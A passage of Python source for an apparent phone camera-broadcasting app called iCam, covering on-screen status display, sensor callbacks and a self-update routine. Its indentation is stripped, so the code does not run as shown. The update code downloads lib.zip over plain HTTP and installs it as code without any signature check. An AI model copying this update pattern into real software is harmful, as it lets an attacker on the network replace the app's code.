myTextMainCam = "Main camera: "
if numCamerasSupported > 0:
if cameraMode[0] == 0:
myTextMainCam += "not used"
elif cameraMode[0] == 1:
myTextMainCam += "video rec, %d [sec]" % videoRecordDuration[0]
#myTextMainCam += "video rec"
elif cameraMode[0] == 2:
myTextMainCam += "take photos"
elif cameraMode[0] == 3:
myTextMainCam += "take video and photos"
myTextMainCam += "."
myTextVGACam = "VGA camera: "
if numCamerasSupported >= 2:
if cameraMode[1] == 0:
myTextVGACam += "not used"
elif cameraMode[1] == 1:
myTextVGACam += "video rec, %d [sec]" % videoRecordDuration[1]
#myTextVGACam += "video rec"
elif cameraMode[1] == 2:
myTextVGACam += "take photos"
elif cameraMode[1] == 3:
myTextVGACam += "take video and photos"
myTextVGACam += "."
myTextUpload = u"Upload to: "
if uploadMediaToYouTube:
myTextUpload += "YouTube "
if uploadMediaToPicasa:
myTextUpload += "Picasa "
if uploadMediaToYouTube or uploadMediaToPicasa:
myTextGoogle = u"Google username: " + googleUsername
if useiCamServer == 1:
myTextUpload += "iCam(no media)"
elif useiCamServer == 2:
myTextUpload += "iCam(all)"
myTextUpload += "."
myTextVer = u"iCam ver: %s." % CURRENT_RELEASE_TIME
myTextAPName = u" Access point used: %s." % accessPointName
#!!!!TODO: reuse code from DisplayRedrawInfoDisplayExtensiveInfo(displayMode=1, displayAllInfo=True):
def DisplayRedrawInfo(partialForAndroid=False):
DebugPrint("Entered DisplayRedrawInfo().")
myTextAudio = u"Microphone rec duration: %d [sec]." % audioRecordDuration
myTextPause = u"Pause: %s." % GetTextPauseInterval()
ComputeInfoStrings()
if SYMBIAN_OS:
global doNotDisplayRedrawInfo
if doNotDisplayRedrawInfo == True:
DebugPrint("DisplayRedrawInfo(): getting out because " \
"doNotDisplayRedrawInfo == True.")
"""
Otherwise it seems it crashes if we do the following operations,
while in the AP Selection dialog.
"""
return
"""
if SYMBIAN_S60_3RD_ED and (not _PyS60_1_9_OR_NEWER):
return
"""
if SYMBIAN_3:
if appuifw.app.orientation == "portrait":
DebugPrint("DisplayRedrawInfo(): getting out because " \
"appuifw.app.orientation == 'portrait'.")
"""
Otherwise it seems it crashes if we do the following operations
(is it because it is printing out of screen??) - see for ex
Z:\1PhD\ReVival\Logs\NokiaE7\2011_05_07\stdout_2011_05_07_15_37_43.txt.
"""
return
DebugPrint("DisplayRedrawInfo(): here 0.")
try:
# At line 0 we have the 3G sign and the application title.
myDelta = 20
# if startButtonPressed == False:
if startButtonPressed:
canvas.text((10, 10 + myDelta), u"iCam is broadcasting.",
fill=(0, 255, 0), font="normal")
#'annotation', 'title', 'legend', 'symbol', 'dense', 'normal'
else:
# Note: the visible canvas for normal display on S60 3rd is of
# 320 x 210 pixels
#canvas.text((10, 0 + myDelta), u"Welcome to iCam!",
# fill=(0, 255, 255))
#canvas.text((10, 15 + myDelta), u"Configure iCam, then go " \
# "to Options and hit Start to run.", fill = (0, 255, 0))
#canvas.text((10, 15 + myDelta), u"Configure iCam & Start " \
# "Broadcasting.", fill = (255, 0, 0))
if orientationForThisPhoneModel == "portrait":
myText = u"Configure & Start"
else:
myText = u"Configure iCam & Start Broadcasting."
canvas.text((10, 10 + myDelta), myText,
fill=(255, 0, 0), font="normal")
#canvas.text((10, 30 + myDelta), u"Your device ID: %s." % deviceId,
# fill = (255, 255, 255))
canvas.text((10, 30 + myDelta), myTextAPName, fill=(255, 255, 255))
canvas.text((10, 45 + myDelta), myTextUpload, fill=(255, 255, 255))
#canvas.text((10, 60 + myDelta), u" Pause interval: %d [sec]. " \
# "Burst detection %d." % (pauseInterval, motionDetectionIsOn),
# fill=(255, 255, 255))
#canvas.text((10, 60 + myDelta), u"Pause: %d [sec]." % pauseInterval,
# fill=(255, 255, 255))
canvas.text((10, 60 + myDelta), myTextPause, fill=(255, 255, 255))
"""
if (cameraMode[0] != 0) and (cameraMode[1] == 0):
myText = "Main"
elif (cameraMode[0] != 0) and (cameraMode[1] != 0):
myText = "Main & VGA"
elif (cameraMode[0] == 0) and (cameraMode[1] != 0):
myText = "VGA"
elif (cameraMode[0] == 0) and (cameraMode[1] == 0):
myText = "None"
canvas.text((10, 75 + myDelta), u"Cameras used: %s." % (myText),
fill = (0, 255, 0))
"""
canvas.text((10, 75 + myDelta), u"Cameras used:", fill=(0, 255, 0))
canvas.text((10, 90 + myDelta), u" %s" % myTextMainCam,
fill=(0, 255, 0))
canvas.text((10, 105 + myDelta), u" %s" % myTextVGACam,
fill=(0, 255, 0))
#canvas.text((10, 75 + myDelta), u"Rec [sec]: Cameras %d & %d, " \
# "Audio %d." % (videoRecordDuration[0],
# videoRecordDuration[1], audioRecordDuration),
# fill = (255, 255, 255))
canvas.text((10, 120 + myDelta), myTextAudio, fill=(0, 255, 0))
canvas.text((10, 135 + myDelta), myTextVer, fill=(255, 255, 255))
except:
DebugPrintErrorTrace()
elif ANDROID_OS:
# HTML_PATHFILENAME = "/sdcard/iCam/index.html"
HTML_PATHFILENAME = LOCAL_FOLDER + "/index.html"
#if not os.path.isfile(HTML_PATHFILENAME):
try:
fOutput = open(HTML_PATHFILENAME, "w")
myText = myTextUpload
myText += "<br/>"
myText += myTextPause + "<br/>"
myText += "Cameras used:<br/>\n"
if numCamerasSupported > 0:
myText += " " + myTextMainCam + "<br/>\n"
myText += myTextAudio + "<br/>\n"
myText += myTextVer + "<br/>\n"
myText += myTextGoogle + "<br/>\n"
# !!!!TODO: use """ ... """ instead - like this you don't need to specify \n, etc
fOutput.write("<html>\n" \
"<head>\n" \
"<title>iCam</title>\n" \
'<style type="text/css">\n' \
"body {\n" \
" background-color: #000000;\n" \
"}\n" \
"body,td,th {\n" \
" color: #00FF00;\n" \
"}\n" \
".style1 {font-size: xx-large}\n" \
"</style></head>\n" \
"<body>\n" \
#'<span class="style1">Configure iCam & Start Broadcasting.</span><br/>\n' \
'<span class="style1">Welcome to iCam!</span><br/>\n' \
"<br/>\n" \
#' (Press Menu, Start Broadcasting to start iCam)<br/>\n' + \
"Configure & Start iCam!<br/><br/>\n" + \
str(myText) + \
"</body>\n" \
"</html>\n"
)
fOutput.close()
if not partialForAndroid:
# wait=False - do NOT "block until the user exits the WebView
myDroid.webViewShow(HTML_PATHFILENAME, False)
except:
DebugPrintErrorTrace()
DebugPrint("Exiting DisplayRedrawInfo().")
#!!!!TODO: reuse code from DisplayRedrawInfo
def DisplayExtensiveInfo(displayMode=1, displayAllInfo=True):
global doNotDisplayRedrawInfo
global canvas
if ANDROID_OS:
DisplayNote(u"Your device ID (IMEI) is %s.\n iCam version: %s\n" % (deviceId, CURRENT_RELEASE_TIME))
elif SYMBIAN_OS:
ComputeInfoStrings()
if displayMode == 0:
try:
# From http://wiki.forum.nokia.com/index.php/Python_on_Symbian/04._Basic_User_Interface#Text_Editor:
myTextEditor = appuifw.Text()
appuifw.app.body = myTextEditor
# See http://pys60.garage.maemo.org/doc/s60/node21.html
# It has only digit chars - letters are replaced by
# "square" char.
#myTextEditor.font = (u"Nokia Hindi S60", 12, None)
myTextEditor.font = "dense"
myTextEditor.add(myTextVer + u"\n" % CURRENT_RELEASE_TIME)
myTextEditor.add(u"Your device ID (IMEI) is %s." % deviceId)
myTextEditor.add(u"\n")
myTextEditor.add(u"Current configuration:")
myTextEditor.add(u"\n")
myTextEditor.add(u" " + myTextAPName)
#myTextEditor.add(u"\n")
"""
myText = u" Upload to: "
if uploadMediaToYouTube:
myText += "YouTube "
if uploadMediaToPicasa:
myText += "Picasa "
if useiCamServer > 0:
myText += "iCam"
myText += "."
myTextEditor.add(myText)
myTextEditor.add(u"")
myTextEditor.add(u" Pause: %d [sec]." % (pauseInterval))
myTextEditor.add(u"")
myTextEditor.add(u" Rec [sec]: Cameras %d & %d, " \
"Microphone %d." \
% (videoRecordDuration[0],
videoRecordDuration[1],
audioRecordDuration))
myTextEditor.add(u"")
myTextEditor.add(u" Photo settings: local=%s, uploaded=%s, " \
"quality=%d." \
% (str(localPhotoResolution),
photoResolutionStr[photoResolutionIndex][0],
photoQuality))
myTextEditor.add(u"")
myTextEditor.add(u" localVideoMode = %s." % str(localVideoMode))
myTextEditor.add(u"")
if storeLocallyMedia == 0:
storeLocallyMediaStr = "no"
elif storeLocallyMedia == 1:
storeLocallyMediaStr = "yes"
else:
storeLocallyMediaStr = ":o"
myTextEditor.add(u" Store locally: %s. Local folder=%s, " \
"media files=%s." \
% (storeLocallyMediaStr, LOCAL_FOLDER,
LOCAL_FOLDER_MEDIA_FILES))
myTextEditor.add(u"")
if readGPS:
myStr = "GPS in use."
else:
myStr = "GPS not in use."
myTextEditor.add(u" %s mode. %s" \
% (bluetoothModeList[bluetoothMode], myStr))
myTextEditor.add(u"")
myTextEditor.add(u" Free: RAM=%.2f; drives: C=%.2f, D=%.2f, "\
"E=%.2f [MB]." \
% (float(GetFreeRAM()) / MEGA_BYTE,
float(GetFreeDriveSpace("C:")) / MEGA_BYTE,
float(GetFreeDriveSpace("D:")) / MEGA_BYTE,
float(GetFreeDriveSpace("E:")) / MEGA_BYTE))
myTextEditor.add(u"")
myTextEditor.add(u" GSM: signal=%d[%s], CC=%d,NC=%d,LAC=%d," \
"CId=%d." \
% (signalStrength, signalUnits,
mobileCountryCode, mobileNetworkCode,
locationAreaCode, cellId))
myTextEditor.add(u"")
myTextEditor.add(u" Battery = %d%%, charger status = %d." \
% (GetBatteryLevelPercentage(), GetChargerStatus()))
#myTextEditor.add()
"""
return
except:
DebugPrintErrorTrace()
# #####################################################################
if displayMode == 1:
doNotDisplayRedrawInfo = True
DebugPrint("Entered DisplayExtensiveInfo().")
if SYMBIAN_3:
if appuifw.app.orientation == "portrait":
DebugPrint("DisplayExtensiveInfo(): getting out because " \
"appuifw.app.orientation == 'portrait'.")
"""
Otherwise it seems it crashes if we do the following
operations (is it because it is printing out of
screen??) - see for ex
Z:\1PhD\ReVival\Logs\NokiaE7\2011_05_07\stdout_2011_05_07_15_37_43.txt.
"""
return
DebugPrint("DisplayExtensiveInfo(): here 0.")
try:
if SYMBIAN_3:
appuifw.app.body.begin_redraw()
elif (S60_EDITION[0] >= 3) and \
(orientationForThisPhoneModel == "landscape"): # if not S60_EDITION == (3, 0):
try:
"""
Yes, even N82 requires it.
Note: begin_redraw() and end_redraw() don't seem to
exist on PyS60 1.4.5
"""
appuifw.app.body.begin_redraw()
except:
DebugPrintErrorTrace()
ClearScreen()
#Note: the visible canvas for normal display on S60 3rd is of
# 320 x 210 pixels
#canvas.text((10, 0), u"Welcome to iCam!", fill=(0, 255, 0))
#canvas.text((10, 15), u"Configure iCam, then go to Options " \
# "and hit Start to run.", fill=(0, 255, 0))
#canvas.text((10, 15), u"Configure iCam & Start Broadcasting.",
# fill=(0, 255, 0))
#canvas.text((10, 15),
# u"Your device ID (IMEI) is %s." % deviceId,
# fill=(255, 255, 255))
canvas.text((10, 15), u"Device ID: %s." % deviceId,
fill=(0, 255, 255))
canvas.text((10, 30), u"Current configuration:",
fill=(255, 255, 255))
DebugPrint("DisplayExtensiveInfo(): here 1.")
canvas.text((10, 45), u" Access point used: %s."
% accessPointName, fill=(255, 255, 255))
#canvas.text((10, 60), u" Upload to: YouTube=%d, Picasa=%d," \
# " iCam=%d." % (uploadMediaToYouTube, uploadMediaToPicasa,
# useiCamServer), fill=(255, 255, 255))
myText = u" %s" % myTextUpload
canvas.text((10, 60), myText, fill=(255, 255, 255))
DebugPrint("DisplayExtensiveInfo(): here 2.")
if motionDetectionIsOn == 0:
motionDetectionIsOnStr = "no"
elif motionDetectionIsOn == 1:
motionDetectionIsOnStr = "yes"
else:
motionDetectionIsOnStr = ":o"
#canvas.text((10, 75), u" Pause interval: %d [sec]. " \
# "Burst detection: %d." % (pauseInterval,
# motionDetectionIsOn), fill=(255, 255, 255))
"""
canvas.text((10, 75),
u" Pause interval: %d [sec]. " \
"Burst detection: %s. BATTERY_LEVEL_THRESHOLD: %d%%." % \
(pauseInterval, motionDetectionIsOnStr,
BATTERY_LEVEL_THRESHOLD),
fill=(255, 255, 255))
"""
"""
canvas.text((10, 75),
u" Pause interval: %d [sec]. " \
"Motion detection: %s." % \
(pauseInterval, motionDetectionIsOnStr),
fill=(255, 255, 255))
"""
canvas.text((10, 75),
u" Pause interval: %s. " \
"Motion detection: %s." % \
(GetTextPauseInterval(), \
motionDetectionIsOnStr),
fill=(255, 255, 255))
#canvas.text((10, 75), u" Pause: %d [sec]." % (pauseInterval),
# fill=(255, 255, 255))
"""
if (cameraMode[0] != 0) and (cameraMode[1] == 0):
myText = "Main"
elif (cameraMode[0] != 0) and (cameraMode[1] != 0):
myText = "Main & VGA"
elif (cameraMode[0] == 0) and (cameraMode[1] != 0):
myText = "VGA"
elif (cameraMode[0] == 0) and (cameraMode[1] == 0):
myText = "none"
canvas.text((10, 90), u" Cameras used: %s." % (myText),
fill=(255, 255, 255))
"""
myText = ""
if numCamerasSupported > 0:
myText += myTextMainCam
if numCamerasSupported >= 2:
myText += " " + myTextVGACam
canvas.text((10, 90), u" Cameras used: %s." % myText,
fill=(255, 255, 255))
DebugPrint("DisplayExtensiveInfo(): here 3.")
canvas.text((10, 105),
u" Rec [sec]: Cameras %d & %d, Microphone %d."
% (videoRecordDuration[0],
videoRecordDuration[1], audioRecordDuration),
fill=(255, 255, 255))
"""
Remember that Nokia 6680 has display of 176 (height?) x 208
pixels, out of which we subtract ~40 pixels of the height.
"""
# if SYMBIAN_3:
if SYMBIAN_3:
if displayAllInfo:
DebugPrint("DisplayExtensiveInfo(): here 4.")
canvas.text((10,120), u" Photo settings: local=%s, " \
"uploaded=%s, quality=%d."
% (str(localPhotoResolution),
photoResolutionStr[photoResolutionIndex][0],
photoQuality), fill=(255, 255, 255))
DebugPrint("DisplayExtensiveInfo(): here 5.")
if videoAudioEnabled == 1:
muteStr = "off"
else:
muteStr = "on"
canvas.text((10, 135),
u" localVideoMode = %s; mute %s."
% (str(localVideoMode), muteStr),
fill=(255, 255, 255))
DebugPrint("DisplayExtensiveInfo(): here 6.")
if storeLocallyMedia == 0:
storeLocallyMediaStr = "no"
elif storeLocallyMedia == 1:
storeLocallyMediaStr = "yes"
else:
storeLocallyMediaStr = ":o"
canvas.text((10, 150), u" Store locally: %s. " \
"Local folder=%s, media files=%s." \
% (storeLocallyMediaStr, LOCAL_FOLDER,
LOCAL_FOLDER_MEDIA_FILES),
fill=(255, 255, 255))
DebugPrint("DisplayExtensiveInfo(): here 7.")
if readGPS:
myStr = "GPS in use."
else:
myStr = "GPS not in use."
#canvas.text((10, 165), u" Bluetooth mode = %d." \
# % (bluetoothMode), fill=(255, 255, 255))
canvas.text((10, 165), u" %s (server is %s). %s"
% (bluetoothModeList[bluetoothMode],
bluetoothServerAddress, myStr),
fill=(255, 255, 255))
DebugPrint("DisplayExtensiveInfo(): here 8.")
"""
if readGPS:
canvas.text((10, 180), u" GPS in use. ",
fill=(255, 255, 255))
else:
canvas.text((10, 180), u" GPS not in use. ",
fill=(255, 255, 255))
"""
DebugPrint("DisplayExtensiveInfo(): here 9.")
canvas.text((10, 180), u" Free: RAM=%.2f; drives: " \
"C=%.2f, D=%.2f, E=%.2f [MB]." \
% (float(GetFreeRAM()) / MEGA_BYTE,
float(GetFreeDriveSpace("C:")) / MEGA_BYTE,
float(GetFreeDriveSpace("D:")) / MEGA_BYTE,
float(GetFreeDriveSpace("E:")) / MEGA_BYTE),
fill=(255, 255, 255))
DebugPrint("DisplayExtensiveInfo(): here 10.")
# viewFinderSize
canvas.text((10, 195), u" GSM: signal=%d[%s], " \
"CC=%d,NC=%d,LAC=%d,CId=%d."
% (signalStrength, signalUnits,
mobileCountryCode, mobileNetworkCode,
locationAreaCode, cellId),
fill=(255, 255, 255))
"""
myStr = u" Battery = %d, charger status = %d." \
% (GetBatteryLevelPercentage(), GetChargerStatus())
DebugPrint("DisplayExtensiveInfo(): here 11 - " \
"myStr = %s" % str(myStr))
"""
#canvas.text((10, 225), u" Battery=%.1f, " \
# "charger status=%d." % (GetBatteryLevelPercentage(),
# GetChargerStatus()), fill = (255, 255, 255))
canvas.text((10, 210),
u" Battery: %d%%, charger status: %s. " \
"Battery_Level_Threshold: %d%%." % \
(GetBatteryLevelPercentage(), \
GetChargerStatusStr(), \
BATTERY_LEVEL_THRESHOLD), \
fill=(255, 255, 255))
DebugPrint("DisplayExtensiveInfo(): here 12.")
if SYMBIAN_3:
appuifw.app.body.end_redraw()
elif (S60_EDITION[0] >= 3) and \
(orientationForThisPhoneModel == "landscape"): # if not S60_EDITION == (3, 0):
try:
"""
Yes, even N82 requires it. Note: begin_redraw() and
end_redraw() don't seem to exist on PyS60 1.4.5.
"""
appuifw.app.body.end_redraw()
except:
DebugPrintErrorTrace()
"""
On N82 - see stdout_2011_05_18_10_19_26.txt:
Exiting DisplayExtensiveInfo().
Entered RedrawHandler(): rect = (0, 0, 320, 198)
Entered DisplayRedrawInfo().
"""
# SleepAndPetWatchdog(3.0)
"""
IMPORTANT: Do not use SleepAndPetWatchdog because it can
mess up (basically it seems it cancels the timer and it
doesn't continue) the already issued
SleepAndPetWatchdog() from ReactiveLoop (this function,
DisplayExtensiveInfo() is called asynchronously).
"""
# We sleep because we want to force RedrawHandler() to be
# issued, while doNotDisplayRedrawInfo = True.
e32.ao_sleep(2.0)
doNotDisplayRedrawInfo = False
"""
SOCKET_DEFAULT_TIMEOUT, uploadUnsentData,
uploadHowManyOfLatestBluetoothMessages
battery = %d. charger_status = %d
signalStrength
free_ram, drive
# From GetTextForState(cameraId):
resText = "Free space in bytes on drive C = %d, " \
"on drive E = %d. " % (GetFreeDriveSpace("C:"),
GetFreeDriveSpace("E:"))
resText += "free_ram = %d. GSM network signal " \
"strength = %d [%s]. Battery = %d, " \
"charger_status = %d. Pause interval " \
"(pauseInterval) = %d. " \
% (GetFreeRAM(), signalStrength, signalUnits,
GetBatteryLevelPercentage(),
GetChargerStatus(), pauseInterval)
resText += "Resolution (photoResolutionIndex) = %d. " \
"photoModeIndex = %d. digitalZoom = %d. " \
"photoQuality = %d. exposureIndex[0] = %d. " \
% (photoResolutionIndex, photoModeIndex[cameraId],
digitalZoom, photoQuality, exposureIndex[0])
resText += "whiteBalanceIndex[0] = %d. exposureIndex[1] = %d."\
" whiteBalanceIndex[1] = %d. flashIndex = %d. " \
"audioRecordDuration = %d. " \
% (whiteBalanceIndex[0], exposureIndex[1],
whiteBalanceIndex[1], flashIndex,
audioRecordDuration)
resText += "rotateDegreesImage = %d. mobileCountryCode = %d. "\
"mobileNetworkCode = %d. locationAreaCode = %d. " \
"cellId = %d." % (rotateDegreesImage,
mobileCountryCode, mobileNetworkCode,
locationAreaCode, cellId)
"""
except:
DebugPrintErrorTrace()
DebugPrint("Exiting DisplayExtensiveInfo().")
if SYMBIAN_OS:
counter = 0
def AccSensorCallback(sensorData):
global counter
counter = counter + 1
if counter % 35 == 0:
DebugPrint("AccSensor: %s" % str(sensorData))
"""
global counter, myCanvas
counter = counter + 1
if (counter % 15) == 0:
myCanvas.clear()
myCanvas.text((10, 175), u"A: %04d %04d %04d" %
(sensorData["data_1"], sensorData["data_2"],
sensorData["data_3"]),
font = "title", fill = 0xff0000)
DebugPrint("AccSensor: %s" % str(sensorData))
"""
def RotSensorCallback(sensorData):
#global myCanvas
#appuifw.Canvas().clear()
#myCanvas.text((10, 140), u"R: %04d %04d %04d" %
# (sensorData["data_1"], sensorData["data_2"], sensorData["data_3"]),
# font = "title", fill = 0xff0000)
#if True:
DebugPrint("RotSensor: %s" % str(sensorData))
try:
import zipfile
zipfileImported = True
except:
zipfileImported = False
DebugPrint("Not able to import the zipfile module.")
DebugPrintErrorTrace()
def CheckZipFile(pathFileName):
# We assume the file exists.
try:
if not zipfile.is_zipfile(pathFileName):
myText = "CheckZipFile(): %s is NOT a valid zip file." % \
pathFileName
DebugPrint(myText)
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, myText, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
return -1
"""
DebugPrint("CheckZipFile(): %s is a valid pkzip file." % pathFileName)
"""
#print '-'*40
# Open the zipped file.
myZipFile = zipfile.ZipFile(pathFileName, "r")
if MY_DEBUG_STDOUT:
print "CheckZipFile(): The contents of the update ZIP file are:"
myZipFile.printdir()
sys.stdout.flush()
#print '-'*40
checkFilenameList = ["a.pyc"]
# Enumerate each archived file and open the manifest.txt.
for myZipInfo in myZipFile.infolist():
fileName = myZipInfo.filename
# checkFilenameList.remove(fileName)
for indexList in range(len(checkFilenameList)):
if checkFilenameList[indexList] == fileName:
checkFilenameList.pop(indexList)
if fileName == "manifest.txt":
# if fname.endswith(".txt"):
# decompress each file's data
manifestData = myZipFile.read(fileName)
DebugPrint( ("The contents of %s are:\n" % fileName) +
manifestData )
# Read manifest.txt to get the update release time and compare
# it with the current version release time.
lineList = manifestData.splitlines()
# Just in case
lineList[0] = lineList[0].rstrip(" \r\n")
tokens = lineList[0].split(": ")
updateReleaseTime = tokens[1]
if updateReleaseTime <= CURRENT_RELEASE_TIME:
myText = "CheckZipFile(): The installed version of iCam " \
"seems to be the most recent one: " \
"updateReleaseTime = %s, " \
"CURRENT_RELEASE_TIME = %s." % \
(updateReleaseTime, CURRENT_RELEASE_TIME)
DebugPrint(myText)
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, myText,
ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
return -1
"""
# save the decompressed data to a new file
filename = 'unzipped_' + fname
fout = open(filename, "wb")
fout.write(data)
fout.close()
print "New file created --> %s" % filename
"""
if checkFilenameList != []:
DebugPrint("CheckZipFile(): The update ZIP file does not " \
"contain the following indicated files: %s" % \
str(checkFilenameList))
return -1
return 0
except:
(exceptionType, exceptionValue, exceptionTraceback) = \
sys.exc_info()
myText = "Exception in CheckZipFile(). Details: time = %s, " \
"free_ram = %d. %s." % \
(GetCurrentDateTimeStringNice(), GetFreeRAM(),
repr(traceback.format_tb(exceptionTraceback)))
"""
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, myText, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
"""
DebugPrint(myText)
#if MY_DEBUG_STDERR:
# sys.stderr.write(myText + "\n")
DebugPrintErrorTrace()
return -1
def ApplyUpdate(UPDATE_PATH_FILENAME, TARGET_UPDATE_PATH_FILENAME,
TARGET_UPDATE_PATH_FILENAME_BACKUP):
if (not zipfileImported) or (CheckZipFile(UPDATE_PATH_FILENAME) == 0):
# We check even more for validity of update Zip file, if we can,
# and if it is OK we apply the update.
try:
# if os.path.exists(TARGET_UPDATE_PATH_FILENAME_BACKUP):
if os.path.isfile(TARGET_UPDATE_PATH_FILENAME_BACKUP):
os.unlink(TARGET_UPDATE_PATH_FILENAME_BACKUP)
except:
DebugPrintErrorTrace()
try:
MoveFileBetweenAnyDrives(TARGET_UPDATE_PATH_FILENAME,
TARGET_UPDATE_PATH_FILENAME_BACKUP)
MoveFileBetweenAnyDrives(UPDATE_PATH_FILENAME,
TARGET_UPDATE_PATH_FILENAME)
# CopyFile("E:/private/e21e55ef/lib.zip",
# "E:/private/e21e55ef/lib_copy.zip")
myText = "Found update %s. Copied it. Restart app to run updated " \
"version." % UPDATE_PATH_FILENAME
DebugPrint(myText)
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, myText, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
appuifw.note(unicode(myText), "info")
except:
DebugPrintErrorTrace()
def AutoUpdate_real():
"""
os.getcwd() returns the place where lib.zip is
installed - e.g., "E:\Private\e21e55ef".
"""
DebugPrint("Entered AutoUpdate(): os.getcwd() = %s." % os.getcwd())
try:
PetWatchdog()
if ANDROID_OS:
pass
elif SYMBIAN_S60_OS:
# elif SYMBIAN_OS:
"""
We do not support yet update for iCam for PyS60 1.4.x
(i.e., S60 2nd edition)
!!!!TODO: copy automatically the a.pyc to the iCam app folder.
"""
if _PyS60_1_9_OR_NEWER == False:
return
# We update iCam for PyS60 1.4.x (S60 3rd+ edition)
LOCAL_FOLDER_BACKUP = LOCAL_FOLDER + "/Backup"
if not os.path.exists(LOCAL_FOLDER_BACKUP):
os.makedirs(LOCAL_FOLDER_BACKUP)
LOCAL_FOLDER_UPDATE_FROM_INTERNET = LOCAL_FOLDER + "/Update"
if not os.path.exists(LOCAL_FOLDER_UPDATE_FROM_INTERNET):
os.makedirs(LOCAL_FOLDER_UPDATE_FROM_INTERNET)
LOCAL_FOLDER_UPDATE_FROM_INTERNET = LOCAL_FOLDER \
+ "/Update/FromInternet"
if not os.path.exists(LOCAL_FOLDER_UPDATE_FROM_INTERNET):
os.makedirs(LOCAL_FOLDER_UPDATE_FROM_INTERNET)
UPDATE_FILENAME = "lib.zip"
UPDATE_FROM_INTERNET_PATH_FILENAME = \
LOCAL_FOLDER_UPDATE_FROM_INTERNET + "/" + \
UPDATE_FILENAME
# TARGET_UPDATE_PATH_FILENAME = "E:/private/e21e55ef/lib.zip"
TARGET_UPDATE_PATH_FILENAME = os.getcwd() + "\\lib.zip"
TARGET_UPDATE_PATH_FILENAME_BACKUP = \
TARGET_UPDATE_PATH_FILENAME + STATE_BACKUP_EXTENSION
# STEP 1: Make a copy of file default.py to LOCAL_FOLDER.
if S60_EDITION[0] >= 3:
PYTHON_SCRIPT_PATH_FILENAME = "./default.py"
else:
PYTHON_SCRIPT_PATH_FILENAME = "./default.py"
# CopyFile(PYTHON_SCRIPT_PATH_FILENAME, E:/iCam_default_copy.py")
# CopyFile(PYTHON_SCRIPT_PATH_FILENAME,
# LOCAL_FOLDER + "/iCam_default_copy.py")
CopyFile(PYTHON_SCRIPT_PATH_FILENAME, LOCAL_FOLDER_BACKUP + \
"/iCam_default_copy.py")
# STEP 2: Make a copy of file lib.zip to LOCAL_FOLDER.
if S60_EDITION[0] >= 3:
PYTHON_SCRIPT_PATH_FILENAME = "./lib.zip"
else:
PYTHON_SCRIPT_PATH_FILENAME = "./lib.zip"
# PYTHON_SCRIPT_PATH_FILENAME_COPY = "E:/lib_copy.zip"
PYTHON_SCRIPT_PATH_FILENAME_COPY = LOCAL_FOLDER_BACKUP + \
"/lib_copy.zip"
if not os.path.isfile(PYTHON_SCRIPT_PATH_FILENAME_COPY):
CopyFile(PYTHON_SCRIPT_PATH_FILENAME,
PYTHON_SCRIPT_PATH_FILENAME_COPY)
# STEP 3: Update from Memory card, if there is such update at
# UPDATE_FROM_DISK_PATH_FILENAME (see below).
UPDATE_FROM_DISK_PATH_FILENAME = LOCAL_FOLDER + \
"/Update/FromLocal/" + UPDATE_FILENAME
if os.path.isfile(UPDATE_FROM_DISK_PATH_FILENAME):
ApplyUpdate(UPDATE_FROM_DISK_PATH_FILENAME,
TARGET_UPDATE_PATH_FILENAME,
TARGET_UPDATE_PATH_FILENAME_BACKUP)
# We tried updating and don't continue any other update.
return
# At least for Symbian we check for uppercase of UPDATE_FILENAME,
# as well. Note: even if on Win the file on memory card looks
# lowercase on Symbian it might be uppercase :)
UPDATE_FROM_DISK_PATH_FILENAME = LOCAL_FOLDER + \
"/Update/FromLocal/" + str.upper(UPDATE_FILENAME)
if os.path.isfile(UPDATE_FROM_DISK_PATH_FILENAME):
ApplyUpdate(UPDATE_FROM_DISK_PATH_FILENAME,
TARGET_UPDATE_PATH_FILENAME,
TARGET_UPDATE_PATH_FILENAME_BACKUP)
# We tried updating and don't continue any other update.
return
# STEP 4: Update from the Internet, if a newer Release version is
# available.
if not accessPointRetryConnect:
try:
# Look for Python runtime for Symbian, Android, etc!!!!
updateReleaseTime = urllib.urlopen("http://" +
ICAM_SERVER_NAME + WEB_FOLDER +
"/GetLatestVersion.php").read()
if (deviceId == IMEI_N95) and \
(updateReleaseTime.find(IMEI_N95) == -1):
DebugPrint("AutoUpdate(): phone with deviceId = %s " \
"expects update with updateReleaseTime " \
"containing its deviceId (i.e., built " \
"for it as well). Since this is not the " \
"case - updateReleaseTime = %s - we bail" \
" out." % (deviceId, updateReleaseTime))
return
#dataUncompressed = dataCompressed.decode("zlib")
# We might have updateReleaseTime ==
# "2011_05_07_09_00_00_N95N95N95N95N95" and we want only
# to look at the date.
if updateReleaseTime[:len(CURRENT_RELEASE_TIME)] <= \
CURRENT_RELEASE_TIME:
myText = "AutoUpdate(): The installed version of " \
"iCam seems to be the most recent one: " \
"updateReleaseTime = %s, " \
"CURRENT_RELEASE_TIME = %s." % \
(updateReleaseTime, CURRENT_RELEASE_TIME)
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, myText,
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT, None)
DebugPrint(myText)
return
else:
myText = "AutoUpdate(): The installed version of " \
"iCam is out-of-date, so we update: " \
"updateReleaseTime = %s, " \
"CURRENT_RELEASE_TIME = %s." % \
(updateReleaseTime, CURRENT_RELEASE_TIME)
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, myText,
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT, None)
DebugPrint(myText)
dataUpdate = urllib.urlopen("http://" +
ICAM_SERVER_NAME + WEB_FOLDER + "/Files/" +
UPDATE_FILENAME).read()
except:
dataUpdate = ""
(exceptionType, exceptionValue, exceptionTraceback) = \
sys.exc_info()
myText = "Exception in AutoUpdate() when downloading " \
"file. Details: time = %s, free_ram = %d. %s." \
% (GetCurrentDateTimeStringNice(),
GetFreeRAM(),
repr(traceback.format_tb(exceptionTraceback)))
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, myText,
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT, None)
DebugPrint(myText)
if MY_DEBUG_STDERR:
# traceback.print_exc()
